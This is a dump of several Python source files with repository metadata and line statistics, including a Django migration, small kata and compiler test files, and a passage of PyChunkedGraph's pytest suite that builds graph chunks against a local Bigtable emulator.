78f3637b4c03c11d7f6ef15b20a1acf699d4be24
|
[
"MIT"
] | null | null | null |
"""ScrollList Component Test"""
import curses
from source.controls import Window
from source.controls import ScrollList as Scroller
__author__ = "Samuel Whang"
def view(screen):
pass
| 18.9
| 50
| 0.777778
| 24
| 189
| 5.958333
| 0.75
| 0.13986
| 0.251748
| 0.335664
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 189
| 9
| 51
| 21
| 0.888199
| 0.132275
| 0
| 0
| 0
| 0
| 0.075949
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0.166667
| 0.5
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 6
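The record above is a stub harness for a curses ScrollList component; its view() body is still `pass`. A hedged sketch of how such a stub is usually made runnable; curses.wrapper restores the terminal even if the body raises, and the drawn text is an illustrative placeholder:

import curses

def view(screen):
    screen.clear()
    screen.addstr(0, 0, "ScrollList component test placeholder")
    screen.refresh()
    screen.getch()  # wait for a keypress before tearing the screen down

if __name__ == "__main__":
    curses.wrapper(view)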
|
a5724709634797eaf22a9f27d89e8c87596f3423
| 115
|
py
|
Python
|
recvCases/conf.py
|
BattleJudge/recvCase
|
b7e55cd3c40603fe2c0086066421b269a0664f1e
|
[
"MIT"
] | null | null | null |
recvCases/conf.py
|
BattleJudge/recvCase
|
b7e55cd3c40603fe2c0086066421b269a0664f1e
|
[
"MIT"
] | null | null | null |
recvCases/conf.py
|
BattleJudge/recvCase
|
b7e55cd3c40603fe2c0086066421b269a0664f1e
|
[
"MIT"
] | null | null | null |
ErrorMsg = {'BadZipFile' : 'Uploaded zip file is bad',
'EmptyZipFile' : 'Uploaded zip file is empty',}
| 57.5
| 59
| 0.626087
| 13
| 115
| 5.538462
| 0.692308
| 0.305556
| 0.416667
| 0.472222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.243478
| 115
| 2
| 59
| 57.5
| 0.827586
| 0
| 0
| 0
| 0
| 0
| 0.62069
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
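The record above defines a lookup table of user-facing error strings keyed by failure kind. A sketch of how such a table is typically consumed when validating an upload; the validate_zip helper and the zipfile checks are illustrative assumptions, not part of the record:

import zipfile

ErrorMsg = {'BadZipFile': 'Uploaded zip file is bad',
            'EmptyZipFile': 'Uploaded zip file is empty'}

def validate_zip(path):
    # Return a user-facing message on failure, None when the archive is usable.
    try:
        with zipfile.ZipFile(path) as zf:
            if not zf.namelist():
                return ErrorMsg['EmptyZipFile']
    except zipfile.BadZipFile:
        return ErrorMsg['BadZipFile']
    return None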
|
a57be98b089324586aa986fd832a393072298d21
| 2,412
|
py
|
Python
|
leads/migrations/0009_alter_bankstatement_bank_statement_and_more.py
|
sumeet2605/CRM
|
1c9a740ef052d0e51b2689dd3e1666ff4673db98
|
[
"MIT"
] | null | null | null |
leads/migrations/0009_alter_bankstatement_bank_statement_and_more.py
|
sumeet2605/CRM
|
1c9a740ef052d0e51b2689dd3e1666ff4673db98
|
[
"MIT"
] | null | null | null |
leads/migrations/0009_alter_bankstatement_bank_statement_and_more.py
|
sumeet2605/CRM
|
1c9a740ef052d0e51b2689dd3e1666ff4673db98
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0 on 2022-02-06 09:46
from django.db import migrations, models
import leads.models
import rizcrm.storage_backends
class Migration(migrations.Migration):
dependencies = [
('leads', '0008_user_profile_picture'),
]
operations = [
migrations.AlterField(
model_name='bankstatement',
name='bank_statement',
field=models.FileField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_kyc),
),
migrations.AlterField(
model_name='c2cdocument',
name='card_copy',
field=models.ImageField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_kyc),
),
migrations.AlterField(
model_name='c2cdocument',
name='card_statement',
field=models.FileField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_kyc),
),
migrations.AlterField(
model_name='document',
name='company_id',
field=models.ImageField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_documents),
),
migrations.AlterField(
model_name='document',
name='pan_card',
field=models.FileField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_documents),
),
migrations.AlterField(
model_name='document',
name='photo',
field=models.ImageField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_documents),
),
migrations.AlterField(
model_name='salaryslip',
name='salary_slip',
field=models.FileField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to=leads.models.handle_upload_kyc),
),
migrations.AlterField(
model_name='user',
name='profile_picture',
field=models.ImageField(blank=True, null=True, storage=rizcrm.storage_backends.PublicMediaStorage(), upload_to='profile_pictures/'),
),
]
| 43.071429
| 161
| 0.665837
| 247
| 2,412
| 6.299595
| 0.234818
| 0.075193
| 0.121465
| 0.1491
| 0.78856
| 0.78856
| 0.780848
| 0.780848
| 0.780848
| 0.780848
| 0
| 0.010672
| 0.223051
| 2,412
| 55
| 162
| 43.854545
| 0.819637
| 0.017828
| 0
| 0.530612
| 1
| 0
| 0.08703
| 0.010562
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.061224
| 0
| 0.122449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
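The migration above rewrites several FileField/ImageField definitions to use a custom storage backend and upload_to callables. A sketch of the model declaration such an AlterField would bring the migration state in line with; PublicMediaStorage and handle_upload_kyc are project-specific names taken from the record, and the snippet only runs inside a configured Django project:

from django.db import models
from rizcrm.storage_backends import PublicMediaStorage  # project-specific
from leads.models import handle_upload_kyc              # project-specific

class BankStatement(models.Model):
    # Passing a storage *instance* means Django serializes the constructor
    # call into the migration, exactly as seen in the record above.
    bank_statement = models.FileField(blank=True, null=True,
                                      storage=PublicMediaStorage(),
                                      upload_to=handle_upload_kyc)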
|
3c325c2ee5bdb7ac85221911bcf0265edefa9de5
| 91
|
py
|
Python
|
8_kyu/Removing_Elements.py
|
UlrichBerntien/Codewars-Katas
|
bbd025e67aa352d313564d3862db19fffa39f552
|
[
"MIT"
] | null | null | null |
8_kyu/Removing_Elements.py
|
UlrichBerntien/Codewars-Katas
|
bbd025e67aa352d313564d3862db19fffa39f552
|
[
"MIT"
] | null | null | null |
8_kyu/Removing_Elements.py
|
UlrichBerntien/Codewars-Katas
|
bbd025e67aa352d313564d3862db19fffa39f552
|
[
"MIT"
] | null | null | null |
def remove_every_other(my_list):
return [my_list[it] for it in range(0,len(my_list),2)]
| 45.5
| 58
| 0.736264
| 19
| 91
| 3.263158
| 0.736842
| 0.290323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025
| 0.120879
| 91
| 2
| 58
| 45.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
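The kata solution above walks every second index through range(); an extended slice is the more idiomatic equivalent, and both keep the even-indexed items. A quick check:

def remove_every_other(my_list):
    # Stride-2 slice: elements at indices 0, 2, 4, ...
    return my_list[::2]

assert remove_every_other([1, 2, 3, 4, 5]) == [1, 3, 5]
assert remove_every_other([]) == []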
|
3c48c2125ebec3cfbc2f8abe3432087a8f247884
| 28
|
py
|
Python
|
ars/__init__.py
|
david-lindner/ARS
|
acfe403ebe90c157d61690a9498597244853fc78
|
[
"BSD-2-Clause"
] | null | null | null |
ars/__init__.py
|
david-lindner/ARS
|
acfe403ebe90c157d61690a9498597244853fc78
|
[
"BSD-2-Clause"
] | null | null | null |
ars/__init__.py
|
david-lindner/ARS
|
acfe403ebe90c157d61690a9498597244853fc78
|
[
"BSD-2-Clause"
] | null | null | null |
from .ars import ARSLearner
| 14
| 27
| 0.821429
| 4
| 28
| 5.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 0.958333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3c90a121b4d915c2524981fd84ae09376497b28d
| 91
|
py
|
Python
|
chocopy-rs/test/pa3/simple_str.py
|
wwylele/chocopy-wwylele
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | 5
|
2020-05-13T03:47:43.000Z
|
2022-01-20T04:52:42.000Z
|
chocopy-rs/test/pa3/simple_str.py
|
wwylele/chocopy-wwylele
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | 4
|
2020-05-18T01:06:15.000Z
|
2020-06-12T19:33:14.000Z
|
chocopy-rs/test/pa3/simple_str.py
|
wwylele/chocopy-rs
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | null | null | null |
print("debug_print: 42")
print("")
print("Hello")
#!
#<->#
#debug_print: 42
#
#Hello
#<->#
| 9.1
| 24
| 0.56044
| 11
| 91
| 4.454545
| 0.363636
| 0.408163
| 0.489796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05
| 0.120879
| 91
| 9
| 25
| 10.111111
| 0.5625
| 0.296703
| 0
| 0
| 0
| 0
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
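The record above ends with comment blocks between '#<->#' markers that encode the program's expected stdout for the ChocoPy test harness. A hedged sketch of a checker built on that inferred convention; the marker handling is deduced from this one file, not from harness documentation:

import subprocess
import sys

def expected_output(source_path):
    with open(source_path) as f:
        lines = f.read().splitlines()
    # Take the block between the first and last '#<->#' markers and strip
    # the leading '#' from each expected-output line.
    start = lines.index('#<->#') + 1
    end = len(lines) - 1 - lines[::-1].index('#<->#')
    return '\n'.join(line[1:] for line in lines[start:end]) + '\n'

def check(source_path):
    # Run the file with the current interpreter and compare its stdout.
    result = subprocess.run([sys.executable, source_path],
                            capture_output=True, text=True)
    return result.stdout == expected_output(source_path)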
|
59373033d6759f87ac888baaf5e7fad69fe7d8fc
| 135,252
|
py
|
Python
|
pychunkedgraph/tests/test.py
|
perlman/PyChunkedGraph
|
2c582f46a8292010e8f9f54c94c63af0b172bdad
|
[
"MIT"
] | null | null | null |
pychunkedgraph/tests/test.py
|
perlman/PyChunkedGraph
|
2c582f46a8292010e8f9f54c94c63af0b172bdad
|
[
"MIT"
] | null | null | null |
pychunkedgraph/tests/test.py
|
perlman/PyChunkedGraph
|
2c582f46a8292010e8f9f54c94c63af0b172bdad
|
[
"MIT"
] | null | null | null |
import sys
import os
import subprocess
import pytest
import numpy as np
from functools import partial
import collections
from grpc._channel import _Rendezvous
from google.cloud import bigtable
from google.auth import credentials
from math import inf
from datetime import datetime, timedelta
from time import sleep
from signal import SIGTERM
from warnings import warn
sys.path.insert(0, os.path.join(sys.path[0], '..'))
from pychunkedgraph.backend import chunkedgraph # noqa
from pychunkedgraph.backend.utils import serializers, column_keys # noqa
from pychunkedgraph.backend import chunkedgraph_exceptions as cg_exceptions # noqa
from pychunkedgraph.creator import graph_tests # noqa
def setup_emulator_env():
bt_env_init = subprocess.run(
["gcloud", "beta", "emulators", "bigtable", "env-init"], stdout=subprocess.PIPE)
os.environ["BIGTABLE_EMULATOR_HOST"] = \
bt_env_init.stdout.decode("utf-8").strip().split('=')[-1]
c = bigtable.Client(
project='IGNORE_ENVIRONMENT_PROJECT',
credentials=credentials.AnonymousCredentials(),
admin=True)
t = c.instance("emulated_instance").table("emulated_table")
try:
t.create()
return True
except Exception as err:
print('Bigtable Emulator not yet ready: %s' % err)
return False
@pytest.fixture(scope='session', autouse=True)
def bigtable_emulator(request):
# Start Emulator
bigtable_emulator = subprocess.Popen(
["gcloud", "beta", "emulators", "bigtable", "start"], preexec_fn=os.setsid,
stdout=subprocess.PIPE)
# Wait for Emulator to start up
print("Waiting for BigTables Emulator to start up...", end='')
retries = 5
while retries > 0:
if setup_emulator_env() is True:
break
else:
retries -= 1
sleep(5)
if retries == 0:
print("\nCouldn't start Bigtable Emulator. Make sure it is installed correctly.")
exit(1)
# Setup Emulator-Finalizer
def fin():
os.killpg(os.getpgid(bigtable_emulator.pid), SIGTERM)
bigtable_emulator.wait()
request.addfinalizer(fin)
@pytest.fixture(scope='function')
def lock_expired_timedelta_override(request):
# HACK: For the duration of the test, set global LOCK_EXPIRED_TIME_DELTA
# to 1 second (otherwise test would have to run for several minutes)
original_timedelta = chunkedgraph.LOCK_EXPIRED_TIME_DELTA
chunkedgraph.LOCK_EXPIRED_TIME_DELTA = timedelta(seconds=1)
# Ensure that we restore the original value, even if the test fails.
def fin():
chunkedgraph.LOCK_EXPIRED_TIME_DELTA = original_timedelta
request.addfinalizer(fin)
return chunkedgraph.LOCK_EXPIRED_TIME_DELTA
@pytest.fixture(scope='function')
def gen_graph(request):
def _cgraph(request, fan_out=2, n_layers=10):
# setup Chunked Graph
dataset_info = {
"data_dir": ""
}
graph = chunkedgraph.ChunkedGraph(
request.function.__name__,
project_id='IGNORE_ENVIRONMENT_PROJECT',
credentials=credentials.AnonymousCredentials(),
instance_id="emulated_instance", dataset_info=dataset_info,
chunk_size=np.array([512, 512, 64], dtype=np.uint64),
is_new=True, fan_out=np.uint64(fan_out),
n_layers=np.uint64(n_layers))
# setup Chunked Graph - Finalizer
def fin():
graph.table.delete()
request.addfinalizer(fin)
return graph
return partial(_cgraph, request)
@pytest.fixture(scope='function')
def gen_graph_simplequerytest(request, gen_graph):
"""
┌─────┬─────┬─────┐
│ A¹ │ B¹ │ C¹ │
│ 1 │ 3━2━┿━━4 │
│ │ │ │
└─────┴─────┴─────┘
"""
graph = gen_graph(n_layers=4)
# Chunk A
create_chunk(graph,
vertices=[to_label(graph, 1, 0, 0, 0, 0)],
edges=[])
# Chunk B
create_chunk(graph,
vertices=[to_label(graph, 1, 1, 0, 0, 0), to_label(graph, 1, 1, 0, 0, 1)],
edges=[(to_label(graph, 1, 1, 0, 0, 0), to_label(graph, 1, 1, 0, 0, 1), 0.5),
(to_label(graph, 1, 1, 0, 0, 0), to_label(graph, 1, 2, 0, 0, 0), inf)])
# Chunk C
create_chunk(graph,
vertices=[to_label(graph, 1, 2, 0, 0, 0)],
edges=[(to_label(graph, 1, 2, 0, 0, 0), to_label(graph, 1, 1, 0, 0, 0), inf)])
graph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]))
graph.add_layer(3, np.array([[2, 0, 0]]))
graph.add_layer(4, np.array([[0, 0, 0], [1, 0, 0]]))
return graph
def create_chunk(cgraph, vertices=None, edges=None, timestamp=None):
"""
Helper function to add vertices and edges to the chunkedgraph - no safety checks!
"""
if not vertices:
vertices = []
if not edges:
edges = []
vertices = np.unique(np.array(vertices, dtype=np.uint64))
edges = [(np.uint64(v1), np.uint64(v2), np.float32(aff)) for v1, v2, aff in edges]
isolated_node_ids = [x for x in vertices if (x not in [edges[i][0] for i in range(len(edges))]) and
(x not in [edges[i][1] for i in range(len(edges))])]
edge_ids = {"in_connected": np.array([], dtype=np.uint64).reshape(0, 2),
"in_disconnected": np.array([], dtype=np.uint64).reshape(0, 2),
"cross": np.array([], dtype=np.uint64).reshape(0, 2),
"between_connected": np.array([], dtype=np.uint64).reshape(0, 2),
"between_disconnected": np.array([], dtype=np.uint64).reshape(0, 2)}
edge_affs = {"in_connected": np.array([], dtype=np.float32),
"in_disconnected": np.array([], dtype=np.float32),
"between_connected": np.array([], dtype=np.float32),
"between_disconnected": np.array([], dtype=np.float32)}
for e in edges:
if cgraph.test_if_nodes_are_in_same_chunk(e[0:2]):
this_edge = np.array([e[0], e[1]], dtype=np.uint64).reshape(-1, 2)
edge_ids["in_connected"] = \
np.concatenate([edge_ids["in_connected"], this_edge])
edge_affs["in_connected"] = \
np.concatenate([edge_affs["in_connected"], [e[2]]])
if len(edge_ids["in_connected"]) > 0:
chunk_id = cgraph.get_chunk_id(edge_ids["in_connected"][0][0])
elif len(vertices) > 0:
chunk_id = cgraph.get_chunk_id(vertices[0])
else:
chunk_id = None
for e in edges:
if not cgraph.test_if_nodes_are_in_same_chunk(e[0:2]):
# Ensure proper order
if chunk_id is not None:
if cgraph.get_chunk_id(e[0]) != chunk_id:
e = [e[1], e[0], e[2]]
this_edge = np.array([e[0], e[1]], dtype=np.uint64).reshape(-1, 2)
if np.isinf(e[2]):
edge_ids["cross"] = \
np.concatenate([edge_ids["cross"], this_edge])
else:
edge_ids["between_connected"] = \
np.concatenate([edge_ids["between_connected"],
this_edge])
edge_affs["between_connected"] = \
np.concatenate([edge_affs["between_connected"], [e[2]]])
isolated_node_ids = np.array(isolated_node_ids, dtype=np.uint64)
cgraph.logger.debug(edge_ids)
cgraph.logger.debug(edge_affs)
# Use affinities as areas
cgraph.add_atomic_edges_in_chunks(edge_ids, edge_affs, edge_affs,
isolated_node_ids,
time_stamp=timestamp)
def to_label(cgraph, l, x, y, z, segment_id):
return cgraph.get_node_id(np.uint64(segment_id), layer=l, x=x, y=y, z=z)
class TestGraphNodeConversion:
@pytest.mark.timeout(30)
def test_compute_bitmasks(self):
pass
@pytest.mark.timeout(30)
def test_node_conversion(self, gen_graph):
cgraph = gen_graph(n_layers=10)
node_id = cgraph.get_node_id(np.uint64(4), layer=2, x=3, y=1, z=0)
assert cgraph.get_chunk_layer(node_id) == 2
assert np.all(cgraph.get_chunk_coordinates(node_id) == np.array([3, 1, 0]))
chunk_id = cgraph.get_chunk_id(layer=2, x=3, y=1, z=0)
assert cgraph.get_chunk_layer(chunk_id) == 2
assert np.all(cgraph.get_chunk_coordinates(chunk_id) == np.array([3, 1, 0]))
assert cgraph.get_chunk_id(node_id=node_id) == chunk_id
assert cgraph.get_node_id(np.uint64(4), chunk_id=chunk_id) == node_id
@pytest.mark.timeout(30)
def test_node_id_adjacency(self, gen_graph):
cgraph = gen_graph(n_layers=10)
assert cgraph.get_node_id(np.uint64(0), layer=2, x=3, y=1, z=0) + np.uint64(1) == \
cgraph.get_node_id(np.uint64(1), layer=2, x=3, y=1, z=0)
assert cgraph.get_node_id(np.uint64(2**53 - 2), layer=10, x=0, y=0, z=0) + np.uint64(1) == \
cgraph.get_node_id(np.uint64(2**53 - 1), layer=10, x=0, y=0, z=0)
@pytest.mark.timeout(30)
def test_serialize_node_id(self, gen_graph):
cgraph = gen_graph(n_layers=10)
assert serializers.serialize_uint64(cgraph.get_node_id(np.uint64(0), layer=2, x=3, y=1, z=0)) < \
serializers.serialize_uint64(cgraph.get_node_id(np.uint64(1), layer=2, x=3, y=1, z=0))
assert serializers.serialize_uint64(cgraph.get_node_id(np.uint64(2 ** 53 - 2), layer=10, x=0, y=0, z=0)) < \
serializers.serialize_uint64(cgraph.get_node_id(np.uint64(2 ** 53 - 1), layer=10, x=0, y=0, z=0))
@pytest.mark.timeout(30)
def test_deserialize_node_id(self):
pass
@pytest.mark.timeout(30)
def test_serialization_roundtrip(self):
pass
@pytest.mark.timeout(30)
def test_serialize_valid_label_id(self):
label = np.uint64(0x01FF031234556789)
assert serializers.deserialize_uint64(
serializers.serialize_uint64(label)) == label
class TestGraphBuild:
@pytest.mark.timeout(30)
def test_build_single_node(self, gen_graph):
"""
Create graph with single RG node 1 in chunk A
┌─────┐
│ A¹ │
│ 1 │
│ │
└─────┘
"""
cgraph = gen_graph(n_layers=2)
# Add Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)])
res = cgraph.table.read_rows()
res.consume_all()
# Check for the RG-to-CG mapping:
# assert chunkedgraph.serialize_uint64(1) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(1)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 0, 0, 0, 0)
# Check for the Level 1 CG supervoxel:
# to_label(cgraph, 1, 0, 0, 0, 0)
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 0)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 0, 0, 0, 0))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 0
assert len(atomic_affinities) == 0
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 0, 0, 0, 1)
# Check for the one Level 2 node that should have been created.
# to_label(cgraph, 2, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 2, 0, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
for aces in atomic_cross_edge_dict.values():
assert len(aces) == 0
assert len(children) == 1 and children[0] == to_label(cgraph, 1, 0, 0, 0, 0)
# Make sure there are not any more entries in the table
assert len(res.rows) == 1 + 1 + 1 + 1
@pytest.mark.timeout(30)
def test_build_single_edge(self, gen_graph):
"""
Create graph with edge between RG supervoxels 1 and 2 (same chunk)
┌─────┐
│ A¹ │
│ 1━2 │
│ │
└─────┘
"""
cgraph = gen_graph(n_layers=2)
# Add Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1), 0.5)])
res = cgraph.table.read_rows()
res.consume_all()
# Check for the two RG-to-CG mappings:
# assert chunkedgraph.serialize_uint64(1) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(1)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 0, 0, 0, 0)
# assert chunkedgraph.serialize_uint64(2) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(2)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 0, 0, 0, 1)
# Check for the two original Level 1 CG supervoxels
# to_label(cgraph, 1, 0, 0, 0, 0)
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 0)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 0, 0, 0, 0))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 1 and atomic_partners[0] == to_label(cgraph, 1, 0, 0, 0, 1)
assert len(atomic_affinities) == 1 and atomic_affinities[0] == 0.5
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 0, 0, 0, 1)
# to_label(cgraph, 1, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 1)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 0, 0, 0, 1))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 1 and atomic_partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
assert len(atomic_affinities) == 1 and atomic_affinities[0] == 0.5
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 0, 0, 0, 1)
# Check for the one Level 2 node that should have been created.
assert serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 2, 0, 0, 0, 1))
column = column_keys.Hierarchy.Child
children = column.deserialize(row[column.key][0].value)
for aces in atomic_cross_edge_dict.values():
assert len(aces) == 0
assert len(children) == 2 and to_label(cgraph, 1, 0, 0, 0, 0) in children and to_label(cgraph, 1, 0, 0, 0, 1) in children
# Make sure there are not any more entries in the table
assert len(res.rows) == 2 + 1 + 1 + 1
@pytest.mark.timeout(30)
def test_build_single_across_edge(self, gen_graph):
"""
Create graph with edge between RG supervoxels 1 and 2 (neighboring chunks)
┌─────┬─────┐
│ A¹ │ B¹ │
│ 1━━┿━━2 │
│ │ │
└─────┴─────┘
"""
cgraph = gen_graph(n_layers=3)
# Chunk A
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 1, 0, 0, 0), inf)])
# Chunk B
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 1, 0, 0, 0)],
edges=[(to_label(cgraph, 1, 1, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 0), inf)])
cgraph.add_layer(3, np.array([[0, 0, 0], [1, 0, 0]]))
res = cgraph.table.read_rows()
res.consume_all()
# Check for the two RG-to-CG mappings:
# assert chunkedgraph.serialize_uint64(1) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(1)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 0, 0, 0, 0)
# assert chunkedgraph.serialize_uint64(2) in res.rows
# row = res.rows[chunkedgraph.serialize_uint64(2)].cells[cgraph.family_id]
# assert np.frombuffer(row[b'cg_id'][0].value, np.uint64)[0] == to_label(cgraph, 1, 1, 0, 0, 0)
# Check for the two original Level 1 CG supervoxels
# to_label(cgraph, 1, 0, 0, 0, 0)
assert serializers.serialize_uint64(to_label(cgraph, 1, 0, 0, 0, 0)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 0, 0, 0, 0))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
cgraph.logger.debug(atomic_node_info.keys())
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 1 and atomic_partners[0] == to_label(cgraph, 1, 1, 0, 0, 0)
assert len(atomic_affinities) == 1 and atomic_affinities[0] == inf
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 0, 0, 0, 1)
# to_label(cgraph, 1, 1, 0, 0, 0)
assert serializers.serialize_uint64(to_label(cgraph, 1, 1, 0, 0, 0)) in res.rows
atomic_node_info = cgraph.get_atomic_node_info(to_label(cgraph, 1, 1, 0, 0, 0))
atomic_affinities = atomic_node_info[column_keys.Connectivity.Affinity]
atomic_partners = atomic_node_info[column_keys.Connectivity.Partner]
parents = atomic_node_info[column_keys.Hierarchy.Parent]
assert len(atomic_partners) == 1 and atomic_partners[0] == to_label(cgraph, 1, 0, 0, 0, 0)
assert len(atomic_affinities) == 1 and atomic_affinities[0] == inf
assert len(parents) == 1 and parents[0] == to_label(cgraph, 2, 1, 0, 0, 1)
# Check for the two Level 2 nodes that should have been created. Since Level 2 has the same
# dimensions as Level 1, we also expect them to be in different chunks
# to_label(cgraph, 2, 0, 0, 0, 1)
assert serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1)) in res.rows
row = res.rows[serializers.serialize_uint64(to_label(cgraph, 2, 0, 0, 0, 1))].cells[cgraph.family_id]
atomic_cross_edge_dict = cgraph.get_atomic_cross_edge_dict(to_label(cgraph, 2, 0, 0, 0, 1))
column = column_keys.Hierarchy.Child
